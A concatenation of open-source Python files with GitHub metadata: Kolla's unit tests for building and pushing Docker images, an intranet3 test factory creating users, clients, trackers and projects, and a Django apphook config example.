"content_hash": "19041c0e9921c54cc99ffb9fbbcfc6fc",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 163,
"avg_line_length": 40.732283464566926,
"alnum_prop": 0.6584187125459114,
"repo_name": "rnagpal/azure-documentdb-python",
"id": "82c3e28b06e067c298f46401d1daa92bf35ff3f3",
"size": "5175",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pydocumentdb/query_iterable.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "609226"
}
],
"symlink_target": ""
} |
import fixtures
import itertools
import os
import requests
import sys
from unittest import mock
from kolla.cmd import build as build_cmd
from kolla import exception
from kolla.image import build
from kolla.tests import base
# Shared fixture images: one parent plus children covering the various
# build statuses.  Tests call .copy() on these rather than mutating the
# module-level instances directly.
FAKE_IMAGE = build.Image(
    'image-base', 'image-base:latest',
    '/fake/path', parent_name=None,
    parent=None, status=build.Status.MATCHED)
FAKE_IMAGE_CHILD = build.Image(
    'image-child', 'image-child:latest',
    '/fake/path2', parent_name='image-base',
    parent=FAKE_IMAGE, status=build.Status.MATCHED)
FAKE_IMAGE_CHILD_UNMATCHED = build.Image(
    'image-child-unmatched', 'image-child-unmatched:latest',
    '/fake/path3', parent_name='image-base',
    parent=FAKE_IMAGE, status=build.Status.UNMATCHED)
FAKE_IMAGE_CHILD_ERROR = build.Image(
    'image-child-error', 'image-child-error:latest',
    '/fake/path4', parent_name='image-base',
    parent=FAKE_IMAGE, status=build.Status.ERROR)
FAKE_IMAGE_CHILD_BUILT = build.Image(
    'image-child-built', 'image-child-built:latest',
    '/fake/path5', parent_name='image-base',
    parent=FAKE_IMAGE, status=build.Status.BUILT)
FAKE_IMAGE_GRANDCHILD = build.Image(
    'image-grandchild', 'image-grandchild:latest',
    '/fake/path6', parent_name='image-child',
    parent=FAKE_IMAGE_CHILD, status=build.Status.MATCHED)
class TasksTest(base.TestCase):
    """Unit tests for the PushTask / BuildTask classes in
    kolla.image.build, with the Docker API client fully mocked out."""

    def setUp(self):
        super(TasksTest, self).setUp()
        self.image = FAKE_IMAGE.copy()
        # NOTE(jeffrey4l): use a real, temporary dir
        self.image.path = self.useFixture(fixtures.TempDir()).path
        self.imageChild = FAKE_IMAGE_CHILD.copy()
        # NOTE(mandre) we want the local copy of FAKE_IMAGE as the parent
        self.imageChild.parent = self.image
        self.imageChild.path = self.useFixture(fixtures.TempDir()).path

    @mock.patch('docker.version', '2.7.0')
    @mock.patch.dict(os.environ, clear=True)
    @mock.patch('docker.APIClient')
    def test_push_image_before_v3_0_0(self, mock_client):
        # docker-py < 3.0.0 still requires the insecure_registry flag.
        self.dc = mock_client
        pusher = build.PushTask(self.conf, self.image)
        pusher.run()
        mock_client().push.assert_called_once_with(
            self.image.canonical_name, decode=True,
            stream=True, insecure_registry=True)

    @mock.patch('docker.version', '3.0.0')
    @mock.patch.dict(os.environ, clear=True)
    @mock.patch('docker.APIClient')
    def test_push_image(self, mock_client):
        self.dc = mock_client
        pusher = build.PushTask(self.conf, self.image)
        pusher.run()
        mock_client().push.assert_called_once_with(
            self.image.canonical_name, decode=True, stream=True)
        self.assertTrue(pusher.success)

    @mock.patch('docker.version', '3.0.0')
    @mock.patch.dict(os.environ, clear=True)
    @mock.patch('docker.APIClient')
    def test_push_image_failure(self, mock_client):
        """failure on connecting Docker API"""
        self.dc = mock_client
        mock_client().push.side_effect = Exception
        pusher = build.PushTask(self.conf, self.image)
        pusher.run()
        mock_client().push.assert_called_once_with(
            self.image.canonical_name, decode=True, stream=True)
        self.assertFalse(pusher.success)
        self.assertEqual(build.Status.PUSH_ERROR, self.image.status)

    @mock.patch('docker.version', '3.0.0')
    @mock.patch.dict(os.environ, clear=True)
    @mock.patch('docker.APIClient')
    def test_push_image_failure_retry(self, mock_client):
        """failure on connecting Docker API, success on retry"""
        self.dc = mock_client
        # First call raises, second call succeeds.
        mock_client().push.side_effect = [Exception, []]
        pusher = build.PushTask(self.conf, self.image)
        pusher.run()
        mock_client().push.assert_called_once_with(
            self.image.canonical_name, decode=True, stream=True)
        self.assertFalse(pusher.success)
        self.assertEqual(build.Status.PUSH_ERROR, self.image.status)

        # Try again, this time without exception.
        pusher.reset()
        pusher.run()
        self.assertEqual(2, mock_client().push.call_count)
        self.assertTrue(pusher.success)
        self.assertEqual(build.Status.BUILT, self.image.status)

    @mock.patch('docker.version', '3.0.0')
    @mock.patch.dict(os.environ, clear=True)
    @mock.patch('docker.APIClient')
    def test_push_image_failure_error(self, mock_client):
        """Docker connected, failure to push"""
        self.dc = mock_client
        mock_client().push.return_value = [{'errorDetail': {'message':
                                                            'mock push fail'}}]
        pusher = build.PushTask(self.conf, self.image)
        pusher.run()
        mock_client().push.assert_called_once_with(
            self.image.canonical_name, decode=True, stream=True)
        self.assertFalse(pusher.success)
        self.assertEqual(build.Status.PUSH_ERROR, self.image.status)

    @mock.patch('docker.version', '3.0.0')
    @mock.patch.dict(os.environ, clear=True)
    @mock.patch('docker.APIClient')
    def test_push_image_failure_error_retry(self, mock_client):
        """Docker connected, failure to push, success on retry"""
        self.dc = mock_client
        mock_client().push.return_value = [{'errorDetail': {'message':
                                                            'mock push fail'}}]
        pusher = build.PushTask(self.conf, self.image)
        pusher.run()
        mock_client().push.assert_called_once_with(
            self.image.canonical_name, decode=True, stream=True)
        self.assertFalse(pusher.success)
        self.assertEqual(build.Status.PUSH_ERROR, self.image.status)

        # Try again, this time without exception.
        mock_client().push.return_value = [{'stream': 'mock push passes'}]
        pusher.reset()
        pusher.run()
        self.assertEqual(2, mock_client().push.call_count)
        self.assertTrue(pusher.success)
        self.assertEqual(build.Status.BUILT, self.image.status)

    @mock.patch.dict(os.environ, clear=True)
    @mock.patch('docker.APIClient')
    def test_build_image(self, mock_client):
        self.dc = mock_client
        push_queue = mock.Mock()
        builder = build.BuildTask(self.conf, self.image, push_queue)
        builder.run()

        mock_client().build.assert_called_once_with(
            path=self.image.path, tag=self.image.canonical_name, decode=True,
            network_mode=None, nocache=False, rm=True, pull=True, forcerm=True,
            buildargs=None)

        self.assertTrue(builder.success)

    @mock.patch.dict(os.environ, clear=True)
    @mock.patch('docker.APIClient')
    def test_build_image_with_network_mode(self, mock_client):
        self.dc = mock_client
        push_queue = mock.Mock()
        self.conf.set_override('network_mode', 'host')
        builder = build.BuildTask(self.conf, self.image, push_queue)
        builder.run()

        mock_client().build.assert_called_once_with(
            path=self.image.path, tag=self.image.canonical_name, decode=True,
            network_mode='host', nocache=False, rm=True, pull=True,
            forcerm=True, buildargs=None)

        self.assertTrue(builder.success)

    @mock.patch.dict(os.environ, clear=True)
    @mock.patch('docker.APIClient')
    def test_build_image_with_build_arg(self, mock_client):
        # Build args from configuration are forwarded to docker build.
        self.dc = mock_client
        build_args = {
            'HTTP_PROXY': 'http://localhost:8080',
            'NO_PROXY': '127.0.0.1'
        }
        self.conf.set_override('build_args', build_args)
        push_queue = mock.Mock()
        builder = build.BuildTask(self.conf, self.image, push_queue)
        builder.run()

        mock_client().build.assert_called_once_with(
            path=self.image.path, tag=self.image.canonical_name, decode=True,
            network_mode=None, nocache=False, rm=True, pull=True, forcerm=True,
            buildargs=build_args)

        self.assertTrue(builder.success)

    @mock.patch.dict(os.environ, {'http_proxy': 'http://FROM_ENV:8080'},
                     clear=True)
    @mock.patch('docker.APIClient')
    def test_build_arg_from_env(self, mock_client):
        # Proxy variables from the process environment are picked up as
        # build args when no config override exists.
        push_queue = mock.Mock()
        self.dc = mock_client
        build_args = {
            'http_proxy': 'http://FROM_ENV:8080',
        }
        builder = build.BuildTask(self.conf, self.image, push_queue)
        builder.run()

        mock_client().build.assert_called_once_with(
            path=self.image.path, tag=self.image.canonical_name, decode=True,
            network_mode=None, nocache=False, rm=True, pull=True, forcerm=True,
            buildargs=build_args)

        self.assertTrue(builder.success)

    @mock.patch.dict(os.environ, {'http_proxy': 'http://FROM_ENV:8080'},
                     clear=True)
    @mock.patch('docker.APIClient')
    def test_build_arg_precedence(self, mock_client):
        # Explicit configuration wins over the environment variable.
        self.dc = mock_client
        build_args = {
            'http_proxy': 'http://localhost:8080',
        }
        self.conf.set_override('build_args', build_args)

        push_queue = mock.Mock()
        builder = build.BuildTask(self.conf, self.image, push_queue)
        builder.run()

        mock_client().build.assert_called_once_with(
            path=self.image.path, tag=self.image.canonical_name, decode=True,
            network_mode=None, nocache=False, rm=True, pull=True, forcerm=True,
            buildargs=build_args)

        self.assertTrue(builder.success)

    @mock.patch('docker.APIClient')
    @mock.patch('requests.get')
    def test_requests_get_timeout(self, mock_get, mock_client):
        # A timeout while fetching a url source marks the image ERROR.
        self.dc = mock_client
        self.image.source = {
            'source': 'http://fake/source',
            'type': 'url',
            'name': 'fake-image-base'
        }
        push_queue = mock.Mock()
        builder = build.BuildTask(self.conf, self.image, push_queue)
        mock_get.side_effect = requests.exceptions.Timeout
        get_result = builder.process_source(self.image, self.image.source)

        self.assertIsNone(get_result)
        self.assertEqual(self.image.status, build.Status.ERROR)
        mock_get.assert_called_once_with(self.image.source['source'],
                                         timeout=120)

        self.assertFalse(builder.success)

    @mock.patch('os.utime')
    @mock.patch('shutil.copyfile')
    @mock.patch('shutil.rmtree')
    @mock.patch('docker.APIClient')
    @mock.patch('requests.get')
    def test_process_source(self, mock_get, mock_client,
                            mock_rmtree, mock_copyfile, mock_utime):
        # Exercise process_source once per source type; all of them are
        # expected to fail here (fake urls/paths) and set ERROR status.
        for source in [{'source': 'http://fake/source1', 'type': 'url',
                        'name': 'fake-image-base1',
                        'reference': 'http://fake/reference1'},
                       {'source': 'http://fake/source2', 'type': 'git',
                        'name': 'fake-image-base2',
                        'reference': 'http://fake/reference2'},
                       {'source': 'http://fake/source3', 'type': 'local',
                        'name': 'fake-image-base3',
                        'reference': 'http://fake/reference3'},
                       {'source': 'http://fake/source4', 'type': None,
                        'name': 'fake-image-base4',
                        'reference': 'http://fake/reference4'}]:
            self.image.source = source
            push_queue = mock.Mock()
            builder = build.BuildTask(self.conf, self.image, push_queue)
            get_result = builder.process_source(self.image, self.image.source)
            self.assertEqual(self.image.status, build.Status.ERROR)
            self.assertFalse(builder.success)
            if source['type'] != 'local':
                self.assertIsNone(get_result)
            else:
                # Local sources return a path even on failure.
                self.assertIsNotNone(get_result)

    @mock.patch('os.path.exists')
    @mock.patch('os.utime')
    @mock.patch('shutil.rmtree')
    def test_process_git_source_existing_dir(self, mock_rmtree, mock_utime,
                                             mock_path_exists):
        # A stale clone directory is removed before the git source is
        # (unsuccessfully, here) fetched again.
        source = {'source': 'http://fake/source1', 'type': 'git',
                  'name': 'fake-image1',
                  'reference': 'fake/reference1'}
        self.image.source = source
        self.image.path = "fake_image_path"
        mock_path_exists.return_value = True
        push_queue = mock.Mock()
        builder = build.BuildTask(self.conf, self.image, push_queue)
        get_result = builder.process_source(self.image, self.image.source)
        mock_rmtree.assert_called_with(
            "fake_image_path/fake-image1-archive-fake-reference1")
        self.assertEqual(self.image.status, build.Status.ERROR)
        self.assertFalse(builder.success)
        self.assertIsNone(get_result)

    @mock.patch('docker.APIClient')
    def test_followups_docker_image(self, mock_client):
        self.imageChild.source = {
            'source': 'http://fake/source',
            'type': 'url',
            'name': 'fake-image-base'
        }
        self.imageChild.children.append(FAKE_IMAGE_CHILD_UNMATCHED)
        push_queue = mock.Mock()
        builder = build.BuildTask(self.conf, self.imageChild, push_queue)
        builder.success = True
        # NOTE(review): 'push' looks like a boolean option; assigning an
        # Image here is merely truthy -- confirm this is intentional.
        self.conf.push = FAKE_IMAGE_CHILD_UNMATCHED
        get_result = builder.followups
        self.assertEqual(1, len(get_result))
class KollaWorkerTest(base.TestCase):
config_file = 'default.conf'
def setUp(self):
super(KollaWorkerTest, self).setUp()
image = FAKE_IMAGE.copy()
image.status = None
image_child = FAKE_IMAGE_CHILD.copy()
image_child.status = None
image_unmatched = FAKE_IMAGE_CHILD_UNMATCHED.copy()
image_error = FAKE_IMAGE_CHILD_ERROR.copy()
image_built = FAKE_IMAGE_CHILD_BUILT.copy()
# NOTE(mandre) we want the local copy of FAKE_IMAGE as the parent
for i in [image_child, image_unmatched, image_error, image_built]:
i.parent = image
self.images = [image, image_child, image_unmatched,
image_error, image_built]
patcher = mock.patch('docker.APIClient')
self.addCleanup(patcher.stop)
self.mock_client = patcher.start()
def test_supported_base_type(self):
rh_base = ['centos', 'rhel']
rh_type = ['source', 'binary', 'rdo', 'rhos']
deb_base = ['ubuntu', 'debian']
deb_type = ['source', 'binary']
for base_distro, install_type in itertools.chain(
itertools.product(rh_base, rh_type),
itertools.product(deb_base, deb_type)):
self.conf.set_override('base', base_distro)
self.conf.set_override('install_type', install_type)
# should no exception raised
build.KollaWorker(self.conf)
def test_unsupported_base_type(self):
for base_distro, install_type in itertools.product(
['ubuntu', 'debian'], ['rdo', 'rhos']):
self.conf.set_override('base', base_distro)
self.conf.set_override('install_type', install_type)
self.assertRaises(exception.KollaMismatchBaseTypeException,
build.KollaWorker, self.conf)
def test_build_image_list_adds_plugins(self):
self.conf.set_override('install_type', 'source')
kolla = build.KollaWorker(self.conf)
kolla.setup_working_dir()
kolla.find_dockerfiles()
kolla.create_dockerfiles()
kolla.build_image_list()
expected_plugin = {
'name': 'neutron-server-plugin-networking-arista',
'reference': 'master',
'source': 'https://opendev.org/x/networking-arista',
'type': 'git'
}
found = False
for image in kolla.images:
if image.name == 'neutron-server':
for plugin in image.plugins:
if plugin == expected_plugin:
found = True
break
break
if not found:
self.fail('Can not find the expected neutron arista plugin')
def test_build_image_list_plugin_parsing(self):
    """Ensure regex used to parse plugins adds them to the correct image"""
    self.conf.set_override('install_type', 'source')
    worker = build.KollaWorker(self.conf)
    worker.setup_working_dir()
    worker.find_dockerfiles()
    worker.create_dockerfiles()
    worker.build_image_list()
    base_seen = False
    for image in worker.images:
        if image.name == 'base':
            base_seen = True
            self.assertEqual(len(image.plugins), 0,
                             'base image should not have any plugins '
                             'registered')
            break
    if not base_seen:
        self.fail('Expected to find the base image in this test')
def test_set_time(self):
    """set_time() runs cleanly on a freshly prepared working dir."""
    self.conf.set_override('install_type', 'source')
    worker = build.KollaWorker(self.conf)
    worker.setup_working_dir()
    worker.set_time()

def _get_matched_images(self, images):
    """Return only the images whose status is MATCHED."""
    matched = build.Status.MATCHED
    return [candidate for candidate in images if candidate.status == matched]
def test_skip_parents(self):
    """skip_parents marks a matched child's parent as SKIPPED."""
    self.conf.set_override('skip_parents', True)
    worker = build.KollaWorker(self.conf)
    worker.images = self.images[:2]
    for img in worker.images:
        img.status = build.Status.UNPROCESSED
        if img.parent:
            img.parent.children.append(img)
    worker.filter_images()
    child = worker.images[1]
    self.assertEqual(build.Status.MATCHED, child.status)
    self.assertEqual(build.Status.SKIPPED, child.parent.status)

def test_skip_parents_regex(self):
    """skip_parents also applies when the child is matched via regex."""
    self.conf.set_override('regex', ['image-child'])
    self.conf.set_override('skip_parents', True)
    worker = build.KollaWorker(self.conf)
    worker.images = self.images[:2]
    for img in worker.images:
        img.status = build.Status.UNPROCESSED
        if img.parent:
            img.parent.children.append(img)
    worker.filter_images()
    child = worker.images[1]
    self.assertEqual(build.Status.MATCHED, child.status)
    self.assertEqual(build.Status.SKIPPED, child.parent.status)
def test_skip_parents_match_grandchildren(self):
    """skip_parents skips the whole ancestor chain of a matched image."""
    self.conf.set_override('skip_parents', True)
    worker = build.KollaWorker(self.conf)
    grandchild = FAKE_IMAGE_GRANDCHILD.copy()
    grandchild.parent = self.images[1]
    self.images[1].children.append(grandchild)
    worker.images = self.images[:2] + [grandchild]
    for img in worker.images:
        img.status = build.Status.UNPROCESSED
        if img.parent:
            img.parent.children.append(img)
    worker.filter_images()
    self.assertEqual(build.Status.MATCHED, worker.images[2].status)
    self.assertEqual(build.Status.SKIPPED, worker.images[2].parent.status)
    self.assertEqual(build.Status.SKIPPED, worker.images[1].parent.status)

def test_skip_parents_match_grandchildren_regex(self):
    """Same ancestor-skipping behaviour when matching via regex."""
    self.conf.set_override('regex', ['image-grandchild'])
    self.conf.set_override('skip_parents', True)
    worker = build.KollaWorker(self.conf)
    grandchild = FAKE_IMAGE_GRANDCHILD.copy()
    grandchild.parent = self.images[1]
    self.images[1].children.append(grandchild)
    worker.images = self.images[:2] + [grandchild]
    for img in worker.images:
        img.status = build.Status.UNPROCESSED
        if img.parent:
            img.parent.children.append(img)
    worker.filter_images()
    self.assertEqual(build.Status.MATCHED, worker.images[2].status)
    self.assertEqual(build.Status.SKIPPED, worker.images[2].parent.status)
    self.assertEqual(build.Status.SKIPPED, worker.images[1].parent.status)
@mock.patch.object(build.Image, 'in_docker_cache')
def test_skip_existing(self, mock_in_cache):
    """skip_existing: images already present in the docker cache are SKIPPED.

    NOTE(review): the side_effect sequence [True, False] is consumed in
    whatever order filter_images() queries the images — presumably
    images[0] first, then images[1]; confirm against build.filter_images.
    """
    mock_in_cache.side_effect = [True, False]
    self.conf.set_override('skip_existing', True)
    kolla = build.KollaWorker(self.conf)
    kolla.images = self.images[:2]
    for i in kolla.images:
        i.status = build.Status.UNPROCESSED
    kolla.filter_images()
    # First image was reported cached -> skipped; second was not -> matched.
    self.assertEqual(build.Status.SKIPPED, kolla.images[0].status)
    self.assertEqual(build.Status.MATCHED, kolla.images[1].status)
def test_without_profile(self):
    """With no profile configured, all five fixture images are matched."""
    worker = build.KollaWorker(self.conf)
    worker.images = self.images
    worker.filter_images()
    self.assertEqual(5, len(self._get_matched_images(worker.images)))

def test_build_rpm_setup(self):
    """checking the length of list of docker commands"""
    self.conf.set_override('rpm_setup_config', ["a.rpm", "b.repo"])
    worker = build.KollaWorker(self.conf)
    self.assertEqual(2, len(worker.rpm_setup))
def test_build_distro_python_version_debian(self):
    """check distro_python_version for Debian"""
    self.conf.set_override('base', 'debian')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('3.9', worker.distro_python_version)

def test_build_distro_python_version_rhel80(self):
    """check distro_python_version for RHEL8.0"""
    self.conf.set_override('base', 'rhel')
    self.conf.set_override('base_tag', '8.0')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('3.6', worker.distro_python_version)

def test_build_distro_python_version_rhel8(self):
    """check distro_python_version for RHEL8"""
    self.conf.set_override('base', 'rhel')
    self.conf.set_override('base_tag', '8')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('3.6', worker.distro_python_version)

def test_build_distro_python_version_ubuntu(self):
    """check distro_python_version for Ubuntu"""
    self.conf.set_override('base', 'ubuntu')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('3.8', worker.distro_python_version)

def test_build_distro_python_version_centos(self):
    """check distro_python_version for CentOS 8.0.1905"""
    self.conf.set_override('base', 'centos')
    self.conf.set_override('base_tag', '8.0.1905')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('3.6', worker.distro_python_version)
def test_build_distro_package_manager(self):
    """check distro_package_manager conf value is taken"""
    self.conf.set_override('distro_package_manager', 'foo')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('foo', worker.distro_package_manager)

def test_build_distro_package_manager_rhel8(self):
    """check distro_package_manager dnf for rhel8"""
    self.conf.set_override('base', 'rhel')
    self.conf.set_override('base_tag', '8')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('dnf', worker.distro_package_manager)

def test_build_distro_package_manager_rhel8_minor(self):
    """check distro_package_manager dnf for rhel8 minor releases"""
    self.conf.set_override('base', 'rhel')
    self.conf.set_override('base_tag', '8.1.2')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('dnf', worker.distro_package_manager)

def test_build_distro_package_manager_debian(self):
    """check distro_package_manager apt for debian"""
    self.conf.set_override('base', 'debian')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('apt', worker.distro_package_manager)

def test_build_distro_package_manager_ubuntu(self):
    """check distro_package_manager apt for ubuntu"""
    self.conf.set_override('base', 'ubuntu')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('apt', worker.distro_package_manager)
def test_base_package_type(self):
    """check base_package_type conf value is taken"""
    self.conf.set_override('base_package_type', 'pip')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('pip', worker.base_package_type)

def test_base_package_type_rhel(self):
    """check base_package_type rpm for rhel"""
    self.conf.set_override('base', 'rhel')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('rpm', worker.base_package_type)

def test_base_package_type_debian(self):
    """check base_package_type deb for debian"""
    self.conf.set_override('base', 'debian')
    worker = build.KollaWorker(self.conf)
    self.assertEqual('deb', worker.base_package_type)
def test_pre_defined_exist_profile(self):
    # default profile include the fake image: image-base
    self.conf.set_override('profile', ['default'])
    worker = build.KollaWorker(self.conf)
    worker.images = self.images
    worker.filter_images()
    self.assertEqual(1, len(self._get_matched_images(worker.images)))

def test_pre_defined_exist_profile_not_include(self):
    # infra profile do not include the fake image: image-base
    self.conf.set_override('profile', ['infra'])
    worker = build.KollaWorker(self.conf)
    worker.images = self.images
    worker.filter_images()
    self.assertEqual(0, len(self._get_matched_images(worker.images)))

def test_pre_defined_not_exist_profile(self):
    # NOTE(jeffrey4l): not exist profile will raise ValueError
    self.conf.set_override('profile', ['not_exist'])
    worker = build.KollaWorker(self.conf)
    worker.images = self.images
    self.assertRaises(ValueError, worker.filter_images)
@mock.patch('json.dump')
def test_list_dependencies(self, dump_mock):
    """list_dependencies() dumps the dependency tree as JSON to stdout."""
    self.conf.set_override('profile', ['all'])
    worker = build.KollaWorker(self.conf)
    worker.images = self.images
    worker.filter_images()
    worker.list_dependencies()
    dump_mock.assert_called_once_with(mock.ANY, sys.stdout, indent=2)
def test_summary(self):
    """summary() reports both hard failures and allowed-to-fail errors."""
    worker = build.KollaWorker(self.conf)
    worker.images = self.images
    worker.image_statuses_good['good'] = build.Status.BUILT
    worker.image_statuses_bad['bad'] = build.Status.ERROR
    worker.image_statuses_allowed_to_fail['bad2'] = build.Status.ERROR
    worker.image_statuses_unmatched['unmatched'] = build.Status.UNMATCHED
    results = worker.summary()
    self.assertEqual('error', results['failed'][0]['status'])  # bad
    self.assertEqual('error', results['failed'][1]['status'])  # bad2
@mock.patch('shutil.copytree')
def test_work_dir(self, copytree_mock):
    """The work_dir option puts the build tree under <work_dir>/docker."""
    self.conf.set_override('work_dir', 'tmp/foo')
    worker = build.KollaWorker(self.conf)
    worker.setup_working_dir()
    self.assertEqual('tmp/foo/docker', worker.working_dir)
class MainTest(base.TestCase):
    """Exit-code behaviour of the build command for each run_build outcome."""

    @mock.patch.object(build, 'run_build')
    def test_images_built(self, mock_run_build):
        # A successfully built image yields exit code 0.
        mock_run_build.return_value = ({}, {'img': 'built'}, {}, {}, {}, {})
        self.assertEqual(0, build_cmd.main())

    @mock.patch.object(build, 'run_build')
    def test_images_unmatched(self, mock_run_build):
        # Unmatched images are not an error.
        mock_run_build.return_value = ({}, {}, {'img': 'unmatched'}, {}, {}, {})
        self.assertEqual(0, build_cmd.main())

    @mock.patch.object(build, 'run_build')
    def test_no_images_built(self, mock_run_build):
        # run_build() returning nothing at all still exits cleanly.
        mock_run_build.return_value = None
        self.assertEqual(0, build_cmd.main())

    @mock.patch.object(build, 'run_build')
    def test_bad_images(self, mock_run_build):
        # Any entry in the "bad" status dict makes the command fail.
        mock_run_build.return_value = ({'img': 'error'}, {}, {}, {}, {}, {})
        self.assertEqual(1, build_cmd.main())

    @mock.patch('sys.argv')
    @mock.patch('docker.APIClient')
    def test_run_build(self, mock_client, mock_sys):
        self.assertTrue(build.run_build())

    @mock.patch.object(build, 'run_build')
    def test_skipped_images(self, mock_run_build):
        mock_run_build.return_value = ({}, {}, {}, {'img': 'skipped'}, {}, {})
        self.assertEqual(0, build_cmd.main())

    @mock.patch.object(build, 'run_build')
    def test_unbuildable_images(self, mock_run_build):
        mock_run_build.return_value = ({}, {}, {}, {}, {'img': 'unbuildable'}, {})
        self.assertEqual(0, build_cmd.main())
| {
"content_hash": "cf2b15bdacb67a104c77e3d51778d887",
"timestamp": "",
"source": "github",
"line_count": 700,
"max_line_length": 79,
"avg_line_length": 40.925714285714285,
"alnum_prop": 0.6146676905892209,
"repo_name": "stackforge/kolla",
"id": "10d70ce5a84916a040a1f3c6a4dd7d5bea08dbca",
"size": "29193",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kolla/tests/test_build.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "23313"
},
{
"name": "Python",
"bytes": "135311"
},
{
"name": "Ruby",
"bytes": "8751"
},
{
"name": "Shell",
"bytes": "34652"
}
],
"symlink_target": ""
} |
from intranet3 import models
class FactoryMixin(object):
    """Test-fixture factory: creates persisted User/Client/Tracker/Project rows.

    Class-level counters make every auto-generated name unique and
    predictable ("user_1", "client_2", ...).
    """

    # Current state of counters used for auto-generated names.
    cid = 1  # Client
    uid = 1  # User
    pid = 1  # Project
    tid = 1  # Tracker

    def create_user(self, name="", domain="stxnext.pl", groups=None, **kwargs):
        """Create, persist (add + flush) and return a User.

        ``groups`` previously defaulted to a mutable ``[]`` shared between
        calls; ``None`` now means "no groups", avoiding cross-call leakage
        if a caller mutates ``user.groups`` afterwards.
        """
        username = name or "user_%s" % self.uid
        user = models.User(
            email="%s@%s" % (username, domain),
            name=username,
            location="wroclaw",
            refresh_token='test_token',
            **kwargs
        )
        # Copy so the caller's list is never aliased by the model.
        user.groups = list(groups) if groups else []
        models.DBSession.add(user)
        models.DBSession.flush()
        if name == "":
            # Only advance the counter when the name was auto-generated.
            self.uid += 1
        return user

    def create_users(self, amount=1, domain="stxnext.pl", groups=None,
                     **kwargs):
        """Create ``amount`` users sharing the same domain and groups."""
        return [
            self.create_user(domain=domain, groups=groups, **kwargs)
            for i in xrange(0, amount)
        ]

    def create_client(self, name="", user=None, **kwargs):
        """Create, persist and return a Client.

        BUG FIX: the ``name`` argument used to be silently ignored; it is
        now honoured, falling back to "client_<n>" when empty.
        """
        if user is None:
            user = self.create_user(groups=['user'])
        client = models.Client(
            coordinator_id=user.id,
            name=name or "client_%s" % self.cid,
            color="red?",
            emails="blabla@gmail.com",
            **kwargs
        )
        models.DBSession.add(client)
        models.DBSession.flush()
        self.cid += 1
        return client

    def create_tracker(self, name="", **kwargs):
        """Create, persist and return a bugzilla-type Tracker."""
        name = name or "tracker_%s" % self.tid
        tracker = models.Tracker(
            type="bugzilla",
            name=name,
            url="http://%s.name" % name,
            mailer='tracker_mailer@example.com',
            **kwargs
        )
        models.DBSession.add(tracker)
        models.DBSession.flush()
        self.tid += 1
        return tracker

    def add_creds(self, user, tracker, login, password='passwordx'):
        """Attach TrackerCredentials linking ``user`` to ``tracker``."""
        creds = models.TrackerCredentials(
            tracker_id=tracker.id,
            user_id=user.id,
            login=login,
            password=password,
        )
        models.DBSession.add(creds)
        models.DBSession.flush()
        return creds

    def create_project(self, name='test project', user=None, client=None,
                       tracker=None, **kwargs):
        """Create, persist and return an active Project.

        Any missing coordinator/client/tracker is created on the fly.
        """
        if user is None:
            user = self.create_user()
        if client is None:
            client = self.create_client()
        if tracker is None:
            tracker = self.create_tracker()
        name = name or "project_%s" % self.pid
        project = models.Project(
            name=name,
            coordinator_id=user.id,
            client_id=client.id,
            tracker_id=tracker.id,
            active=True,
            **kwargs
        )
        models.DBSession.add(project)
        models.DBSession.flush()
        self.pid += 1
        return project
| {
"content_hash": "21976867e5a5f670b8c1c70a28471e71",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 68,
"avg_line_length": 26.043478260869566,
"alnum_prop": 0.48981636060100164,
"repo_name": "stxnext/intranet-open",
"id": "f758077e4bdd541042768d7c9e0dc04a34aeeac5",
"size": "2995",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/intranet3/intranet3/testing/factory.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "209248"
},
{
"name": "JavaScript",
"bytes": "67808"
},
{
"name": "Python",
"bytes": "535298"
},
{
"name": "SQL",
"bytes": "5168"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, print_function, unicode_literals
from aldryn_apphooks_config.models import AppHookConfig
from aldryn_apphooks_config.utils import setup_config
from app_data import AppDataForm
from django import forms
from django.db import models
from django.utils.translation import ugettext_lazy as _
class ExampleConfig(AppHookConfig):
    """Adds some translatable, per-app-instance fields."""
    # Per-instance title displayed by the example app.
    app_title = models.CharField(_('application title'), max_length=234)


class AnotherExampleConfig(AppHookConfig):
    """Second config variant used to exercise multiple apphook configs."""
    # Upper bound on the number of entries the example app lists.
    max_entries = models.SmallIntegerField(default=5)


class ExampleConfigForm(AppDataForm):
    # Extra app-data fields stored on ExampleConfig instances.
    property = forms.CharField()
    published_default = forms.BooleanField(initial=True, required=False)


# Register the form as the app-data form of its config model.
setup_config(ExampleConfigForm, ExampleConfig)


class AnotherExampleConfigForm(AppDataForm):
    # Single extra app-data field for the second config model.
    property = forms.CharField()


setup_config(AnotherExampleConfigForm, AnotherExampleConfig)
| {
"content_hash": "7a2e291aa7102e09ac21e2c1cadc4e76",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 72,
"avg_line_length": 33.214285714285715,
"alnum_prop": 0.7989247311827957,
"repo_name": "Venturi/oldcms",
"id": "b11eb075c2b16edd7e9c690a52e130b9f8f53836",
"size": "954",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "env/lib/python2.7/site-packages/aldryn_apphooks_config/tests/utils/example/cms_appconfig.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "40171"
},
{
"name": "CSS",
"bytes": "418090"
},
{
"name": "HTML",
"bytes": "467117"
},
{
"name": "JavaScript",
"bytes": "916100"
},
{
"name": "PHP",
"bytes": "2231"
},
{
"name": "Python",
"bytes": "15786894"
},
{
"name": "Ruby",
